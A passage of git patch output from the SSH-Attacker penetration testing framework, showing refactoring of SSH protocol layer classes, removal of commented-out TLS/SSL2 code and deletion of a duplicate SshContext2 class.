Optional.ofNullable(serverReserved); - } - - // endregion - // region Setters for Key Exchange Initialization Fields - public void setClientCookie(byte[] clientCookie) { - this.clientCookie = clientCookie; - } - - public void setServerCookie(byte[] serverCookie) { - this.serverCookie = serverCookie; - } - - public void setClientSupportedKeyExchangeAlgorithms( - List clientSupportedKeyExchangeAlgorithms) { - this.clientSupportedKeyExchangeAlgorithms = clientSupportedKeyExchangeAlgorithms; - } - - public void setServerSupportedKeyExchangeAlgorithms( - List serverSupportedKeyExchangeAlgorithms) { - this.serverSupportedKeyExchangeAlgorithms = serverSupportedKeyExchangeAlgorithms; - } - - public void setClientSupportedHostKeyAlgorithms( - List clientSupportedHostKeyAlgorithms) { - this.clientSupportedHostKeyAlgorithms = clientSupportedHostKeyAlgorithms; - } - - public void setServerSupportedHostKeyAlgorithms( - List serverSupportedHostKeyAlgorithms) { - this.serverSupportedHostKeyAlgorithms = serverSupportedHostKeyAlgorithms; - } - - public void setClientSupportedEncryptionAlgorithmsClientToServer( - List clientSupportedEncryptionAlgorithmsClientToServer) { - this.clientSupportedEncryptionAlgorithmsClientToServer = - clientSupportedEncryptionAlgorithmsClientToServer; - } - - public void setClientSupportedEncryptionAlgorithmsServerToClient( - List clientSupportedEncryptionAlgorithmsServerToClient) { - this.clientSupportedEncryptionAlgorithmsServerToClient = - clientSupportedEncryptionAlgorithmsServerToClient; - } - - public void setServerSupportedEncryptionAlgorithmsServerToClient( - List serverSupportedEncryptionAlgorithmsServerToClient) { - this.serverSupportedEncryptionAlgorithmsServerToClient = - serverSupportedEncryptionAlgorithmsServerToClient; - } - - public void setServerSupportedEncryptionAlgorithmsClientToServer( - List serverSupportedEncryptionAlgorithmsClientToServer) { - this.serverSupportedEncryptionAlgorithmsClientToServer = - serverSupportedEncryptionAlgorithmsClientToServer; - } - - public void setClientSupportedMacAlgorithmsClientToServer( - List clientSupportedMacAlgorithmsClientToServer) { - this.clientSupportedMacAlgorithmsClientToServer = - clientSupportedMacAlgorithmsClientToServer; - } - - public void setClientSupportedMacAlgorithmsServerToClient( - List clientSupportedMacAlgorithmsServerToClient) { - this.clientSupportedMacAlgorithmsServerToClient = - clientSupportedMacAlgorithmsServerToClient; - } - - public void setServerSupportedMacAlgorithmsServerToClient( - List serverSupportedMacAlgorithmsServerToClient) { - this.serverSupportedMacAlgorithmsServerToClient = - serverSupportedMacAlgorithmsServerToClient; - } - - public void setServerSupportedMacAlgorithmsClientToServer( - List serverSupportedMacAlgorithmsClientToServer) { - this.serverSupportedMacAlgorithmsClientToServer = - serverSupportedMacAlgorithmsClientToServer; - } - - public void setClientSupportedCompressionMethodsClientToServer( - List clientSupportedCompressionMethodsClientToServer) { - this.clientSupportedCompressionMethodsClientToServer = - clientSupportedCompressionMethodsClientToServer; - } - - public void setClientSupportedCompressionMethodsServerToClient( - List clientSupportedCompressionMethodsServerToClient) { - this.clientSupportedCompressionMethodsServerToClient = - clientSupportedCompressionMethodsServerToClient; - } - - public void setServerSupportedCompressionMethodsServerToClient( - List serverSupportedCompressionMethodsServerToClient) { - this.serverSupportedCompressionMethodsServerToClient = - serverSupportedCompressionMethodsServerToClient; - } - - public void setServerSupportedCompressionMethodsClientToServer( - List serverSupportedCompressionMethodsClientToServer) { - this.serverSupportedCompressionMethodsClientToServer = - serverSupportedCompressionMethodsClientToServer; - } - - public void setClientSupportedLanguagesClientToServer( - List clientSupportedLanguagesClientToServer) { - this.clientSupportedLanguagesClientToServer = clientSupportedLanguagesClientToServer; - } - - public void setClientSupportedLanguagesServerToClient( - List clientSupportedLanguagesServerToClient) { - this.clientSupportedLanguagesServerToClient = clientSupportedLanguagesServerToClient; - } - - public void setServerSupportedLanguagesServerToClient( - List serverSupportedLanguagesServerToClient) { - this.serverSupportedLanguagesServerToClient = serverSupportedLanguagesServerToClient; - } - - public void setServerSupportedLanguagesClientToServer( - List serverSupportedLanguagesClientToServer) { - this.serverSupportedLanguagesClientToServer = serverSupportedLanguagesClientToServer; - } - - public void setClientFirstKeyExchangePacketFollows( - boolean clientFirstKeyExchangePacketFollows) { - this.clientFirstKeyExchangePacketFollows = clientFirstKeyExchangePacketFollows; - } - - public void setServerFirstKeyExchangePacketFollows( - boolean serverFirstKeyExchangePacketFollows) { - this.serverFirstKeyExchangePacketFollows = serverFirstKeyExchangePacketFollows; - } - - public void setClientReserved(int clientReserved) { - this.clientReserved = clientReserved; - } - - public void setServerReserved(int serverReserved) { - this.serverReserved = serverReserved; - } - - // endregion - - // region Getters for Negotiated Parameters - public Optional getKeyExchangeAlgorithm() { - return Optional.ofNullable(keyExchangeAlgorithm); - } - - public Optional getHostKeyAlgorithm() { - return Optional.ofNullable(hostKeyAlgorithm); - } - - public Optional getEncryptionAlgorithmClientToServer() { - return Optional.ofNullable(encryptionAlgorithmClientToServer); - } - - public Optional getEncryptionAlgorithmServerToClient() { - return Optional.ofNullable(encryptionAlgorithmServerToClient); - } - - public Optional getMacAlgorithmClientToServer() { - return Optional.ofNullable(macAlgorithmClientToServer); - } - - public Optional getMacAlgorithmServerToClient() { - return Optional.ofNullable(macAlgorithmServerToClient); - } - - public Optional getCompressionMethodClientToServer() { - return Optional.ofNullable(compressionMethodClientToServer); - } - - public Optional getCompressionMethodServerToClient() { - return Optional.ofNullable(compressionMethodServerToClient); - } - - // endregion - // region Setters for Negotiated Parameters - public void setKeyExchangeAlgorithm(KeyExchangeAlgorithm keyExchangeAlgorithm) { - this.keyExchangeAlgorithm = keyExchangeAlgorithm; - } - - public void setHostKeyAlgorithm(PublicKeyAlgorithm hostKeyAlgorithm) { - this.hostKeyAlgorithm = hostKeyAlgorithm; - } - - public void setEncryptionAlgorithmClientToServer( - EncryptionAlgorithm encryptionAlgorithmClientToServer) { - this.encryptionAlgorithmClientToServer = encryptionAlgorithmClientToServer; - } - - public void setEncryptionAlgorithmServerToClient( - EncryptionAlgorithm encryptionAlgorithmServerToClient) { - this.encryptionAlgorithmServerToClient = encryptionAlgorithmServerToClient; - } - - public void setMacAlgorithmClientToServer(MacAlgorithm macAlgorithmClientToServer) { - this.macAlgorithmClientToServer = macAlgorithmClientToServer; - } - - public void setMacAlgorithmServerToClient(MacAlgorithm macAlgorithmServerToClient) { - this.macAlgorithmServerToClient = macAlgorithmServerToClient; - } - - public void setCompressionMethodClientToServer( - CompressionMethod compressionMethodClientToServer) { - this.compressionMethodClientToServer = compressionMethodClientToServer; - } - - public void setCompressionMethodServerToClient( - CompressionMethod compressionMethodServerToClient) { - this.compressionMethodServerToClient = compressionMethodServerToClient; - } - - // endregion - - // region Getters for Key Exchange Fields - public Optional getDhKeyExchangeInstance() { - return Optional.ofNullable(dhKeyExchangeInstance); - } - - public Optional getDhGexKeyExchangeInstance() { - return Optional.ofNullable(dhGexKeyExchangeInstance); - } - - public Optional getEcdhKeyExchangeInstance() { - return Optional.ofNullable(ecdhKeyExchangeInstance); - } - - public Optional getHybridKeyExchangeInstance() { - return Optional.ofNullable(hybridKeyExchangeInstance); - } - - public Optional getRsaKeyExchangeInstance() { - return Optional.ofNullable(rsaKeyExchangeInstance); - } - - public boolean isOldGroupRequestReceived() { - return oldGroupRequestReceived; - } - - public Optional getMinimalDhGroupSize() { - return Optional.ofNullable(minimalDhGroupSize); - } - - public Optional getPreferredDhGroupSize() { - return Optional.ofNullable(preferredDhGroupSize); - } - - public Optional getMaximalDhGroupSize() { - return Optional.ofNullable(maximalDhGroupSize); - } - - public Optional> getHostKey() { - return Optional.ofNullable(hostKey); - } - - public Optional getServerExchangeHashSignature() { - return Optional.ofNullable(serverExchangeHashSignature); - } - - public Optional isServerExchangeHashSignatureValid() { - return Optional.ofNullable(serverExchangeHashSignatureValid); - } - // endregion - // region Setters for Key Exchange Fields - public void setDhKeyExchangeInstance(DhKeyExchange dhKeyExchangeInstance) { - this.dhKeyExchangeInstance = dhKeyExchangeInstance; - } - - public void setDhGexKeyExchangeInstance(DhKeyExchange dhGexKeyExchangeInstance) { - this.dhGexKeyExchangeInstance = dhGexKeyExchangeInstance; - } - - public void setEcdhKeyExchangeInstance(AbstractEcdhKeyExchange ecdhKeyExchangeInstance) { - this.ecdhKeyExchangeInstance = ecdhKeyExchangeInstance; - } - - public void setHybridKeyExchangeInstance(HybridKeyExchange HybridKeyExchangeInstance) { - this.hybridKeyExchangeInstance = HybridKeyExchangeInstance; - } - - public void setRsaKeyExchangeInstance(RsaKeyExchange rsaKeyExchangeInstance) { - this.rsaKeyExchangeInstance = rsaKeyExchangeInstance; - } - - public void setOldGroupRequestReceived(boolean oldGroupRequestReceived) { - this.oldGroupRequestReceived = oldGroupRequestReceived; - } - - public void setMinimalDhGroupSize(Integer minimalDhGroupSize) { - this.minimalDhGroupSize = minimalDhGroupSize; - } - - public void setPreferredDhGroupSize(Integer preferredDhGroupSize) { - this.preferredDhGroupSize = preferredDhGroupSize; - } - - public void setMaximalDhGroupSize(Integer maximalDhGroupSize) { - this.maximalDhGroupSize = maximalDhGroupSize; - } - - public void setHostKey(SshPublicKey hostKey) { - this.hostKey = hostKey; - } - - public void setServerExchangeHashSignature(byte[] serverExchangeHashSignature) { - this.serverExchangeHashSignature = serverExchangeHashSignature; - } - - public void setServerExchangeHashSignatureValid(Boolean isValid) { - this.serverExchangeHashSignatureValid = isValid; - } - // endregion - - // region Getters for Exchange Hash and Cryptographic Keys - public ExchangeHashInputHolder getExchangeHashInputHolder() { - return exchangeHashInputHolder; - } - - public Optional getExchangeHash() { - return Optional.ofNullable(exchangeHash); - } - - public Optional getSessionID() { - return Optional.ofNullable(sessionID); - } - - public Optional getSharedSecret() { - return Optional.ofNullable(sharedSecret); - } - - public Optional getKeySet() { - return Optional.ofNullable(keySet); - } - // endregion - // region Setters for Exchange Hash and Cryptographic Keys - public void setExchangeHash(byte[] exchangeHash) { - this.exchangeHash = exchangeHash; - } - - public void setSessionID(byte[] sessionID) { - this.sessionID = sessionID; - } - - public void setSharedSecret(byte[] sharedSecret) { - this.sharedSecret = sharedSecret; - } - - public void setKeySet(KeySet transportKeySet) { - this.keySet = transportKeySet; - } - // endregion - - // region for Connection Protocol Fields - public HashMap getChannels() { - return channelManager.getChannels(); - } - - public ChannelManager getChannelManager() { - return channelManager; - } - - public void setChannelManager(ChannelManager channelManager) { - this.channelManager = channelManager; - } - // endregion - - public boolean isDisconnectMessageReceived() { - return disconnectMessageReceived; - } - - public void setDisconnectMessageReceived(Boolean disconnectMessageReceived) { - this.disconnectMessageReceived = disconnectMessageReceived; - } - - public boolean isVersionExchangeComplete() { - return versionExchangeCompleted; - } - - public void setVersionExchangeComplete(Boolean complete) { - this.versionExchangeCompleted = complete; - } - - public boolean isClient() { - return connection.getLocalConnectionEndType() == ConnectionEndType.CLIENT; - } - - public boolean isServer() { - return connection.getLocalConnectionEndType() == ConnectionEndType.SERVER; - } - - public boolean isHandleAsClient() { - return handleAsClient; - } - - public void setHandleAsClient(boolean handleAsClient) { - this.handleAsClient = handleAsClient; - } - - -}*/ diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index 5b112a493..103f5b181 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -318,11 +318,11 @@ private void setContainers(LayerStackProcessingResult processingResults) { .getUsedContainers()); } - if (processingResults.getResultForLayer(ImplementedLayers.Session) != null) { + if (processingResults.getResultForLayer(ImplementedLayers.TransportLayer) != null) { packets = new ArrayList<>( processingResults - .getResultForLayer(ImplementedLayers.Session) + .getResultForLayer(ImplementedLayers.TransportLayer) .getUsedContainers()); } } @@ -352,7 +352,7 @@ private List getGenericReceiveConfigurations(LayerStack laye LayerConfiguration messageSsh1Configuration = new GenericReceiveLayerConfiguration(ImplementedLayers.SSHv1); LayerConfiguration recordConfiguration = - new GenericReceiveLayerConfiguration(ImplementedLayers.Session); + new GenericReceiveLayerConfiguration(ImplementedLayers.TransportLayer); layerConfigurationList = sortLayerConfigurations( layerStack, @@ -376,7 +376,7 @@ private List getSpecificReceiveConfigurations( ImplementedLayers.SSHv1, protocolMessagesToReceive); LayerConfiguration recordConfiguration = new SpecificReceiveLayerConfiguration<>( - ImplementedLayers.Session, packetsToRecieve); + ImplementedLayers.TransportLayer, packetsToRecieve); if (packetsToRecieve == null || packetsToRecieve.isEmpty()) { // always allow (trailing) records when no records were set // a ReceiveAction actually intended to expect no records is pointless diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java index 9c89fd7b5..68f00d907 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java @@ -164,9 +164,7 @@ public List sortLayerConfigurations( continue; } Optional layerConfiguration = Optional.empty(); - if (layer == ImplementedLayers.SSHv1 - || layer == ImplementedLayers.SSHv2 - || layer == ImplementedLayers.Session) { + if (layer == ImplementedLayers.SSHv1 || layer == ImplementedLayers.SSHv2) { layerConfiguration = unsortedLayerConfigurations.stream() .filter(layerConfig -> layerConfig.getLayerType().equals(layer)) From 7331946efd67c384f555eaee8872d46b7d6b1698 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 16 Jul 2023 22:05:04 +0200 Subject: [PATCH 041/176] Intermediate Release: Basic SSH Working --- .../core/layer/LayerStackFactory.java | 35 - .../layer/constant/ImplementedLayers.java | 3 - .../layer/constant/LayerConfiguration.java | 8 - .../core/layer/context/SshContext.java | 5 +- .../core/layer/impl/SSH2Layer.java | 8 +- .../sshattacker/core/layer/impl/TcpLayer.java | 9 - .../core/layer/impl/TransportLayer.java | 195 +--- .../sshattacker/core/state/SshContext2.java | 963 ------------------ .../core/workflow/action/MessageAction.java | 8 +- .../core/workflow/action/SshAction.java | 4 +- 10 files changed, 10 insertions(+), 1228 deletions(-) delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext2.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java index c72dc9d4f..1916d045f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java @@ -30,43 +30,8 @@ public static LayerStack createLayerStack(LayerConfiguration type, Context conte LayerStack layerStack; SshContext sshContext = context.getSshContext(); TcpContext tcpContext = context.getTcpContext(); - // HttpContext httpContext = context.getHttpContext(); switch (type) { - /*case OPEN_VPN: - case QUIC: - case STARTTLS: - throw new UnsupportedOperationException("Not implemented yet"); - case DTLS: - return new LayerStack( - context, - new MessageLayer(tlsContext), - new DtlsFragmentLayer(tlsContext), - new RecordLayer(tlsContext), - new UdpLayer(tlsContext)); - case TLS: - layerStack = - new LayerStack( - context, - new MessageLayer(tlsContext), - new RecordLayer(tlsContext), - new TcpLayer(tcpContext)); - context.setLayerStack(layerStack); - return layerStack; - case HTTPS: - layerStack = - new LayerStack( - context, - new HttpLayer(httpContext), - new MessageLayer(tlsContext), - new RecordLayer(tlsContext), - new TcpLayer(tcpContext)); - return layerStack; - case SSL2: - layerStack = - new LayerStack( - context, new SSL2Layer(tlsContext), new TcpLayer(tcpContext)); - return layerStack;*/ case SSHv1: layerStack = new LayerStack( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java index 7df24ce40..3ec31ac82 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/ImplementedLayers.java @@ -10,10 +10,7 @@ /** Holds all implemented layers of the TLS-Core, not limited to any layer of the ISO stack */ public enum ImplementedLayers implements LayerType { TCP, - AuthenticationLayer, - ConnectionLayer, TransportLayer, - Session, SSHv1, SSHv2; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java index f38293719..c1e9e2564 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java @@ -15,12 +15,4 @@ public enum LayerConfiguration { SSHv1, SSHv2; - /* TLS, - DTLS, - QUIC, - OPEN_VPN, - - STARTTLS, - HTTPS, - SSL2; */ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index 7caac1aaa..b57a248ca 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -24,7 +24,6 @@ import de.rub.nds.sshattacker.core.packet.crypto.PacketEncryptor; import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; import de.rub.nds.sshattacker.core.packet.layer.PacketLayerFactory; -import de.rub.nds.sshattacker.core.protocol.common.layer.MessageLayer; import de.rub.nds.sshattacker.core.protocol.connection.Channel; import de.rub.nds.sshattacker.core.protocol.connection.ChannelManager; import de.rub.nds.sshattacker.core.state.Context; @@ -253,7 +252,7 @@ public PacketCipher getActiveDecryptCipher() { private KeySet keySet; // endregion - public MessageLayer getMessageLayer() { + /* public MessageLayer getMessageLayer() { return messageLayer; } @@ -261,7 +260,7 @@ public void setMessageLayer(MessageLayer messageLayer) { this.messageLayer = messageLayer; } - private MessageLayer messageLayer = new MessageLayer(this.getContext()); + private MessageLayer messageLayer = new MessageLayer(this.getContext());*/ // region Connection Protocol diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 0e8846545..d2edda3ff 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -119,7 +119,7 @@ private void processMessage( collectedMessageStream.writeBytes(message.getCompleteResultingMessage().getValue()); - if (message.getCompleteResultingMessage().getValue()[0] + /* if (message.getCompleteResultingMessage().getValue()[0] == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue() || message.getCompleteResultingMessage().getValue()[0] == ProtocolMessageType.SSH_MSG_KEXINIT.getValue()) { @@ -128,7 +128,7 @@ private void processMessage( LOGGER.info( "[bro] Adjusting Context while messagetype is {}", message.getCompleteResultingMessage().getValue()[0]); - } + }*/ } @Override @@ -226,19 +226,15 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_CHANNEL_CLOSE: readChannelCloseMessage(); break; - case SSH_MSG_CHANNEL_EOF: readChannelEofMessage(); break; - case SSH_MSG_CHANNEL_EXTENDED_DATA: readChannelExtendedDataMessage(); break; - case SSH_MSG_CHANNEL_FAILURE: readChannelFailureMessage(); break; - case SSH_MSG_CHANNEL_OPEN_FAILURE: readChannelOpenFailureMessage(); break; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index 8d3ba4da6..d8040d7da 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -96,15 +96,6 @@ public HintedInputStream getDataStream() throws IOException { LOGGER.debug( "[bro] TCP-Layer is transmitting Datastream now with Timeout ", getTransportHandler().getTimeout()); - // TODO: remove later, just for debugging - /* - try { - TimeUnit.SECONDS.sleep(1); - } catch (InterruptedException e) { - throw new RuntimeException(e); - } - */ - InputStream handlerStream = getTransportHandler().getInputStream(); try { while (handlerStream.available() == 0 && retries < maxRetries) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 60da4ebcf..b402eba91 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -7,18 +7,6 @@ */ package de.rub.nds.sshattacker.core.layer.impl; -/*import de.rub.nds.sshattacker.core.constants.SSL2MessageType; -import de.rub.nds.sshattacker.core.constants.SSL2TotalHeaderLengths; -import de.rub.nds.sshattacker.core.constants.ssl.SSL2ByteLength; -import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; -import de.rub.nds.sshattacker.core.exceptions.TimeoutException; -import de.rub.nds.sshattacker.core.layer.LayerConfiguration; -import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.message.*;*/ - import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.PacketLayerType; @@ -63,26 +51,6 @@ public TransportLayer(SshContext context) { @Override public LayerProcessingResult sendConfiguration() throws IOException { - /*LayerConfiguration configuration = getLayerConfiguration(); - if (configuration != null && !configuration.getContainerList().isEmpty()) { - for (ProtocolMessage ssl2message : configuration.getContainerList()) { - ProtocolMessagePreparator preparator = ssl2message.getPreparator(context); - preparator.prepare(); - preparator.afterPrepare(); - ssl2message.getHandler(context).adjustContext(ssl2message); - ProtocolMessageSerializer serializer = ssl2message.getSerializer(context); - byte[] serializedMessage = serializer.serialize(); - ssl2message.setCompleteResultingMessage(serializedMessage); - ssl2message.getHandler(context).adjustContextAfterSerialize(ssl2message); - ssl2message.getHandler(context).updateDigest(ssl2message, true); - getLowerLayer() - .sendData( - new RecordLayerHint(ssl2message.getProtocolMessageType()), - serializedMessage); - addProducedContainer(ssl2message); - } - } - return getLayerResult();*/ LayerConfiguration configuration = getLayerConfiguration(); if (configuration != null && configuration.getContainerList() != null) { @@ -103,55 +71,11 @@ public LayerProcessingResult sendConfiguration() throws IOException { LayerProcessingResult layerProcessingResult = getLowerLayer().sendData(null, serializedMessage); - /*sendPacket(context, packet); - Handler handler = message.getHandler(context); - if (handler instanceof MessageSentHandler) { - ((MessageSentHandler) handler).adjustContextAfterMessageSent(); - } - return new MessageActionResult( - Collections.singletonList(packet), Collections.singletonList(message));*/ } catch (IOException e) { LOGGER.warn("Error while sending packet: " + e.getMessage()); - // return new MessageActionResult(); + // return new LayerProcessingResult(); } } - - /*public MessageActionResult sendMessages( - SshContext context, Stream> messageStream) { - return messageStream - .map(message -> sendMessage(context, message)) - .reduce(MessageActionResult::merge) - .orElse(new MessageActionResult()); - }*/ - - /* ProtocolMessageType contentType = packet.getContentMessageType(); - if (contentType == null) { - contentType = ProtocolMessageType.UNKNOWN; - LOGGER.warn( - "Sending record without a LayerProcessing hint. Using \"UNKNOWN\" as the type"); - } - */ - /*if (encryptor.getRecordCipher(writeEpoch).getState().getVersion().isDTLS() - && session.getEpoch() == null) { - session.setEpoch(writeEpoch); - }*/ - /* - if (packet.getCleanProtocolMessageBytes() == null) { - packet.setCleanProtocolMessageBytes(new byte[0]); - } - SessionPreparator preparator = - packet.getSessionPreparator( - context, */ - /* encryptor, compressor, */ - /* contentType); - preparator.prepare(); - preparator.afterPrepare(); - SessionSerializer serializer = packet.getSessionSerializer(); - byte[] serializedMessage = serializer.serialize(); - packet.setCompleteRecordBytes(serializedMessage); - getLowerLayer().sendData(null, serializedMessage); - addProducedContainer(packet); - }*/ } return getLayerResult(); } @@ -195,56 +119,6 @@ public LayerProcessingResult sendData( List packets = new LinkedList<>(); packets.add(packet); - /* - - List packets = new LinkedList<>(); - List givenPackets = getLayerConfiguration().getContainerList(); - - int dataToBeSent = additionalData.length; - - while (givenPackets.size() > 0 && dataToBeSent > 0) { - AbstractPacket nextPacket = givenPackets.remove(0); - packets.add(nextPacket); - */ - /* int recordData = - (nextPacket.get() != null - ? nextPacket.getMaxRecordLengthConfig() - : context.getChooser().getOutboundMaxRecordDataSize()); - dataToBeSent -= recordData;*/ - /* - } - - ByteArrayOutputStream stream = new ByteArrayOutputStream(); - - - - // prepare, serialize, and send records - for (AbstractPacket packet : packets) { - */ - /* ProtocolMessageType contentType = packet.getContentMessageType(); - if (contentType == null) { - contentType = type; - }*/ - /* - */ - /* if (encryptor.getRecordCipher(writeEpoch).getState().getVersion().isDTLS()) { - record.setEpoch(writeEpoch); - }*/ - /* - Preparator preparator = packet.getPreparator(context); - preparator.prepare(); - preparator.afterPrepare(); - try { - byte[] recordBytes = packet.getSerializer(context).serialize(); - packet.setCompletePacketBytes(recordBytes); - stream.write(packet.getCompletePacketBytes().getValue()); - } catch (IOException ex) { - throw new PreparationException( - "Could not write Record bytes to ByteArrayStream", ex); - } - addProducedContainer(packet); - }*/ - getLowerLayer().sendData(null, serializedMessage); return new LayerProcessingResult<>(packets, getLayerType(), true); } @@ -252,75 +126,9 @@ public LayerProcessingResult sendData( @Override public LayerProcessingResult receiveData() { - /*try { - int messageLength = 0; - byte paddingLength = 0; - byte[] totalHeader; - HintedInputStream dataStream = null; - SSL2MessageType messageType; - try { - - dataStream = getLowerLayer().getDataStream(); - totalHeader = dataStream.readNBytes(SSL2ByteLength.LENGTH); - - if (SSL2TotalHeaderLengths.isNoPaddingHeader(totalHeader[0])) { - messageLength = resolveUnpaddedMessageLength(totalHeader); - paddingLength = 0x00; - } else { - messageLength = resolvePaddedMessageLength(totalHeader); - paddingLength = dataStream.readByte(); - } - messageType = SSL2MessageType.getMessageType(dataStream.readByte()); - } catch (IOException e) { - LOGGER.warn( - "Failed to parse SSL2 message header, parsing as unknown SSL2 message", e); - messageType = SSL2MessageType.SSL_UNKNOWN; - } - - SSL2Message message = null; - - switch (messageType) { - case SSL_CLIENT_HELLO: - message = new SSL2ClientHelloMessage(); - break; - case SSL_CLIENT_MASTER_KEY: - message = new SSL2ClientMasterKeyMessage(); - break; - case SSL_SERVER_VERIFY: - message = new SSL2ServerVerifyMessage(); - break; - case SSL_SERVER_HELLO: - message = new SSL2ServerHelloMessage(); - break; - default: - message = new UnknownSSL2Message(); - } - - message.setType((byte) messageType.getType()); - message.setMessageLength(messageLength); - message.setPaddingLength((int) paddingLength); - readDataContainer(message, context); - - } catch (TimeoutException ex) { - LOGGER.debug(ex); - } catch (EndOfStreamException ex) { - LOGGER.debug("Reached end of stream, cannot parse more messages", ex); - } - - return getLayerResult();*/ throw new UnsupportedOperationException("Not supported yet."); } - /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { - return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_TWO_BIT.getValue()) << 8 - | totalHeaderLength[1]; - } - - private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) { - return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_ONE_BIT.getValue()) << 8 - | totalHeaderLength[1]; - }*/ - @Override public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { LOGGER.debug("[bro] receiveMoreDataForHint now in Transport"); @@ -472,7 +280,6 @@ public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) case SSH_MSG_NEWCOMPRESS: LOGGER.debug("[bro] returning SSH_MSG_NEWCOMPRESS Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWCOMPRESS); - case SSH_MSG_KEXINIT: LOGGER.debug("[bro] returning SSH KEX INIT Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXINIT); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext2.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext2.java deleted file mode 100644 index fb85168eb..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext2.java +++ /dev/null @@ -1,963 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.state; - -import de.rub.nds.sshattacker.core.config.Config; -import de.rub.nds.sshattacker.core.connection.AliasedConnection; -import de.rub.nds.sshattacker.core.constants.*; -import de.rub.nds.sshattacker.core.crypto.hash.ExchangeHashInputHolder; -import de.rub.nds.sshattacker.core.crypto.kex.AbstractEcdhKeyExchange; -import de.rub.nds.sshattacker.core.crypto.kex.DhKeyExchange; -import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; -import de.rub.nds.sshattacker.core.crypto.kex.RsaKeyExchange; -import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; -import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; -import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; -import 